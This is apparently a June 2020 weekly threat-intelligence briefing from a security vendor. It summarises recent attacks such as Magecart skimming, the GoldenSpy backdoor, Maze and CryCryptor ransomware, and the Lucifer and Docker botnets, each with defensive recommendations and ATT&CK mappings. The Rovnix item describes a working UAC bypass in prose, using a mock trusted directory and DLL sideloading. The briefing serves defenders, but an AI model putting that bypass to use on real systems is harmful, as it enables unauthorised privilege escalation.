Weekly Threat Briefing: Backdoors, Magecart, Spearphishing, Ransomware and More | Anomali
Get COVID-19 Cyber Security Resources Learn More

Weekly Threat Briefing: Backdoors, Magecart, Spearphishing, Ransomware and More

June 30, 2020 | Anomali Threat Research Team

The various threat intelligence stories in this iteration of the Weekly Threat Briefing discuss the following topics: Cryptojacking, Data Breach, Maze Ransomware, PII and Vulnerabilities. The IOCs related to these stories are attached to the Weekly Threat Briefing and can be used to check your logs for potential malicious activity.


Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.

Trending Cyber News and Threat Intelligence

Warning—Apple Suddenly Catches TikTok Secretly Spying On Millions Of iPhone Users

(published: June 26, 2020)

A vulnerability in iOS has enabled applications to access the user’s clipboard, without the user’s permission. The issue has been fixed in iOS 14, with a warning message informing users when an app reads the clipboard contents. With this new feature, Chinese social media app TikTok has been caught accessing the clipboard information of users. When the issue first arose at the start of the year, TikTok claimed the clipboard issue was due to a third-party SDK and that they would no longer be using this library. However, with the update in iOS 14, users will receive a message when their clipboard is being accessed by apps such as TikTok. It is also worth noting that due to the universal nature of Apple’s clipboard, information copied on a user’s Mac or iPad can be read on iOS devices.
Recommendation: iOS users should update their iOS version and TikTok version as soon as they are released. Users should also be aware that applications such as TikTok and others will have access to their clipboard contents, which for many users may include passwords, and other sensitive information.
Tags: China, Clipboard, iOS 14, Spying, TikTok

US Local Government Services Targeted by New Magecart Credit Card Skimming Attack

(published: June 26, 2020)

Trend Micro researchers have analyzed Magecart card skimming campaigns targeting eight different unnamed cities in the U.S. The operators behind the attacks were compromising platforms made by city officials that were based off of "Click2Gov", a utility used by local government for online payments and organising events. Once compromised, the operators planted card skimmers focused on collecting the credit card information and Personally Identifiable Information (PII) from users. Click2Gov has continuously been targeted as part of card skimming operations in the U.S with five of the eight cities in this operation having been previously targeted. There is not any evidence as of yet to connect these previous campaigns to this one.
Recommendation: Customer-facing companies that store credit card data must actively defend against Point-of-Sale (POS) threats and stay on top of industry compliance requirements and regulations. All POS networks should be aggressively monitored for these types of threats. In the case of infection, the affected networks should be repopulated. Furthermore, customers should be notified as soon as possible and potentially offered fraud protection to avoid negative media coverage and reputation.
MITRE ATT&CK: [MITRE ATT&CK] Exfiltration Over Command and Control Channel - T1041 | [MITRE ATT&CK] Automated Collection - T1119
Tags: Magecart, Card Skimming, Click2Gov, U.S, PII

Hackers Breach E27, Want "Donation" To Reveal Vulnerabilities

(published: June 26, 2020)

E27 is a media company that provides a forum for Asian technology startup news and information, as well as a member community to share ideas. The actor group calling themselves "Korean Hackers" and "Team Johnwick" claim to have exfiltrated source code and data from the company. They then contacted E27 asked for a "donation" to reveal the vulnerabilities used.
Recommendation: Affected users should change their password for E27 and if that password was used for any other accounts it should be changed as well. The company should ensure that it is using industry standards for defence in depth. It is crucial that your company ensure that servers are always running the most current software version. Your company should have policies in place in regards to the proper configurations needed for your servers to conduct your business needs safely. In addition, policies should be in place in regards to Bring-Your-Own-Device (BYOD) to consider every device as a potential security liability. Furthermore, always practice Defense-in-Depth (do not rely on single security mechanisms - security measures should be layered, redundant, and failsafe).
Tags: E27, Data Breach, Korea, PII

Chinese Bank Forced Western Companies to Install Malware-laced Tax Software

(published: June 25, 2020)

Security researchers from Trustwave have determined that an unnamed Chinese bank is implanting a backdoor trojan called "GoldenSpy" on target systems that use their official tax software. Any companies that used the bank were required to use a software called "Intelligent Tax" developed by the Golden Tax Department of the Aisino Corporation to pay taxes. The software does allow companies to pay taxes, but also installs GoldenSpy with system level privileges. The backdoor allows for unknown threat actors to remotely execute windows commands and upload/download other payloads. Targets of GoldenSpy consisted of two unnamed UK-based organisations, one being a software vendor and the other being a large financial association. Trustwave has not attributed who is backing the deployment of GoldenSpy against organisations working.
Recommendation: All applications should be carefully researched prior to installing on a personal or work machine. Applications that request additional permissions upon installation should be carefully vetted prior to allowing permissions. Additionally, all applications, especially free versions, should only be downloaded from trusted vendors.
MITRE ATT&CK: [MITRE ATT&CK] Scheduled Task - T1053 | [MITRE ATT&CK] Command-Line Interface - T1059 | [MITRE ATT&CK] Create Account - T1136 | [MITRE PRE-ATT&CK] Upload, install, and configure software/tools - T1362
Tags: GoldenSpy, Backdoor, China

CryptoCore Group Steals $200 Million in Cryptocurrency

(published: June 25, 2020)

ClearSky analysts have reported that the Russian-speaking group “CryptoCore” are believed to have been responsible for stealing over $200 million of cryptocurrency from several exchanges over the past two years. The group also known as “Dangerous Password” and “Leery Turtle,” are believed to operate out of Russia, Ukraine or Romania. ClearSky assert that CryptoCore were able to use spearphishing and social engineering techniques to deliver the Mimikatz malware to exchange employees in the US and Japan. Once the Mimikatz was delivered, CryptoCore attempted to access password managers with the goal of extracting crypto-wallet keys, before moving laterally across the network and extracting the cryptocurrency.
Recommendation: Spearphishing emails represent a significant security risk as the sending email will often appear legitimate to the target; sometimes a target company email is compromised and used for such emails. Education is the best defense, inform your employees on what to expect for information requests from their managers and colleagues. Employees should also be aware of whom to contact when they suspect they are the target of a possible spear phishing attack.
Tags: CryptoCore, Cryptocurrency, MimiKatz, Phishing, Russia, Ukraine

LG Electronic Allegedly Hit By Maze Ransomware Attack

(published: June 25, 2020)

Threat actors utilizing the Maze ransomware have reportedly accessed and subsequently compromised the network of the South Korean Electronic organisation LG. How the operators were able access LG's network is yet to be clarified but they allegedly collected over 40GB of data that relate to ongoing projects with several U.S companies. The operators released a screenshot of several files and emails stolen from LG to prove legitimacy of the compromise. Whilst the infection vector for LG is unknown, Maze operators have been known to use exposed remote desktop connections in order to access administrative accounts and steal information.
Recommendation: Ransomware is a continually evolving threat. It is paramount to have a comprehensive and tested backup solution in place in addition to a business continuity policy in place. In the unfortunate case a reproducible backup is not in place, make sure to check for a decryptor before considering payment; avoid payment at all costs. Ransomware should be reported to law enforcement agencies who are doing their best to track these actors and prevent ransom from being a profitable business for threat actors.
MITRE ATT&CK: [MITRE ATT&CK] Data Encrypted for Impact - T1486
Tags: Maze, Ransomware, LG Electronics

Lucifer: New Cryptojacking and DDoS Hybrid Malware Exploiting High and Critical Vulnerabilities to Infect Windows Devices

(published: June 24, 2020)

Researchers from Unit 42 have revealed that a new variant of the hybrid cryptojacking malware called "Lucifer" is being used in campaigns that leverages a remote code execution vulnerability (CVE-2019-9081) in the Laravel Framework to access systems. Lucifer is capable of performing Distributed Denial of Service (DDoS) attacks, executing arbitrary commands, communicating to it's Command and Control (C2) server, and will drop XMRig on target machines to mine Monero cryptocurrency. Lucifer relies on several different, critical vulnerabilities including EternalBlue and EternalRomance to move laterally on target networks, create backdoors, and brute-force credentials. Mined cryptocurrency and other collected information is exfiltrated to the C2 server.
Recommendation: Lucifer relies heavily on vulnerabilities within targets systems that have had patches made available for them for quite some time. It is important that your company has patch-maintenance policies in place, particularly when there are Bring Your Own Device (BYOD) policies in use. Once a vulnerability has been reported on in open sources, threat actors will likely attempt to incorporate the exploitation of the vulnerability into their malicious operations. Patches should be reviewed and applied as soon as possible to prevent potential malicious activity.
MITRE ATT&CK: [MITRE ATT&CK] Scheduled Task - T1053 | [MITRE ATT&CK] Command-Line Interface - T1059 | [MITRE ATT&CK] Registry Run Keys / Startup Folder - T1060 | [MITRE ATT&CK] Uncommonly Used Port - T1065 | [MITRE ATT&CK] Standard Application Layer Protocol - T1071 | [MITRE ATT&CK] Brute Force - T1110 | [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] Resource Hijacking - T1496 | [MITRE ATT&CK] Virtualization/Sandbox Evasion - T1497 | [MITRE ATT&CK] Endpoint Denial of Service - T1499
Tags: Lucifer, Cryptojacking, Windows, CVE-2014-6287, CVE-2017-0144, CVE-2017-0145, CVE-2017-8464, CVE-2017-10271, CVE-2018-20062, CVE-2018-1000861, CVE-2019-9081

New Ransomware Posing as COVID-19 Tracing App Targets Canada; ESET Offers Decryptor

(published: June 24, 2020)

A new ransomware called "CryCryptor" has been identified by ESET researchers that masquerades as an official COVID-19 tracing app implemented by Health Canada. The malicious app became available on the Google Play Store shortly after the Canadian government announced their own contact tracing app. Once installed, CryCryptor requests access to files on the device and then will encrypt any files existing on external media. Encrypted files will be appended with ".enc" extensions. After encryption is completed a file called "readme_now.txt" is dropped in every directory holding encrypted files. ESET researchers have been able to provide a decryptor for CryCryptor due to a bug in the application that allows for any exported service to be run by the ransomware service. They developed an app that would launch the decryption built within CryCryptor ransomware.
Recommendation: Threat actors continue to use trusted vendors such as the Google Play Store for distributing malware and because of this mobile users must remain vigilant in what they are downloading and the permissions that they are requesting. In the scenario by which you become compromised by the CryCryptor ransomware, it is advised to download the legitimate app developed by ESET to decrypt your files.
Tags: CryCryptor, COVID-19, Canada, Mobile, Ransomware

Software Security Update for NVIDIA GPU Display Driver

(published: June 24, 2020)

NVIDIA has released a software security update for NVIDIA GPU Display Driver. This update addresses issues that may lead to denial of service, escalation of privileges, or information disclosure.
Recommendation: Download and install software update through the NVIDIA Driver Downloads page or for the vGPU software update, through the NVIDIA Licensing Portal.
Tags: NVIDIA , escalation of privileges , CVE-2020-5962,CVE-2020-5962,CVE-2020-5963,CVE-2020-5964,CVE-2020-5965,CVE-2020-5966,CVE-2020-5967,CVE-2020-5968,CVE-2020-59670, CVE-2020-5973

XORDDoS, Kaiji Botnet Malware Variants Target Exposed Docker Servers

(published: June 23, 2020)

Trend Micro researchers have detected two Linux-based botnets targeting Docker servers. The two malware are named XORDDoS and Kaiji. In addition to scanning for SSH (port 22) and TELNET (port 23), the malware has added scanning capabilities for port 2375 too. This is the standard API port used by Docker and can be enabled for remote administration of the service. When XORDDoS finds a server with the port exposed, the malware uses the API to instruct all containers running on the server to download and execute the malware. Kaiji’s approach is different. Instead of adding the malware to the already running containers, it deploys a new container containing the malware. The goal of the malware is to perform DDoS attacks for the botmaster.
Recommendation: By default, Docker only provides API access via unix domain socket that requires either root or docker group permissions. Access via TCP can be enabled but is unencrypted and unauthenticated. If API access over TCP is enabled, it should be protected by either the built in HTTPS encrypted socket or by using a Web proxy in front that handles the authentication and encryption.
MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] Network Denial of Service - T1498
Tags: DDoS, Botnet, Docker, Kaiji, XORDDoS

Oh, What A Boot-iful Mornin’

(published: June 23, 2020)

Researchers at Kaspersky Labs have detected malspam distributing new versions of Rovnix bootkit that have added a UAC bypass mechanism. The Rovnix source code was leaked in 2013, and it appears that the malware author is using the code to turn Rovnix into a backdoor with “Trojan-Spy elements.” One of the functionalities is to record audio from the microphone. The UAC bypass technique used is a method called “Mocking Trusted Directories” and was discovered by Tenable in 2018. The malware creates the folder “C:\Windows \System32” with a space between “Windows” and “\”. It copies wusa.exe which is vulnerable to DLL sideloading to the folder. Due to a bug in “GetLongPathNameW”, the space is stripped and the security checks believes the trusted binary is executed from within a trusted folder and allows for privilege elevation without displaying a warning message to the user.
Recommendation: Educate your employees on the risks of opening attachments from unknown senders. Anti-spam and antivirus applications provided from trusted vendors should also be employed. Emails that are received from unknown senders should be carefully avoided, and attachments from such senders should not be opened.
MITRE ATT&CK: [MITRE ATT&CK] Spearphishing Attachment - T1193 | [MITRE ATT&CK] User Execution - T1204 | [MITRE ATT&CK] Bootkit - T1067 | [MITRE ATT&CK] Bypass User Account Control - T1088 | [MITRE ATT&CK] Deobfuscate/Decode Files or Information - T1140 | [MITRE ATT&CK] DLL Search Order Hijacking - T1038 | [MITRE ATT&CK] Audio Capture - T1123
Tags: Malspam, Rovnix, UAC by-pass, boot-kit

Hackers Using Google Analytics to Bypass Web Security and Steal Credit Cards

(published: June 23, 2020)

Hackers are exploiting Google's Analytics service to stealthily pilfer credit card information from infected e-commerce sites. Actors are now injecting data-stealing code on the compromised websites in combination with tracking code generated by Google Analytics for their own account, letting them exfiltrate payment information entered by users even in conditions where content security policies are enforced for maximum web security.
Recommendation: Keep all your software up to date, do not install web applications and CMS components from untrusted sources, use strong and complex passwords to protect administration panels.
Tags: CreditCards, Google-Analytics, E-commerce, Webskimming

Anomali Threat Research Team
About the Author

Anomali Threat Research Team

Subscribe to the Anomali Newsletter—get the latest Anomali updates and cybersecurity news straight to your inbox each month.

Subscribe Now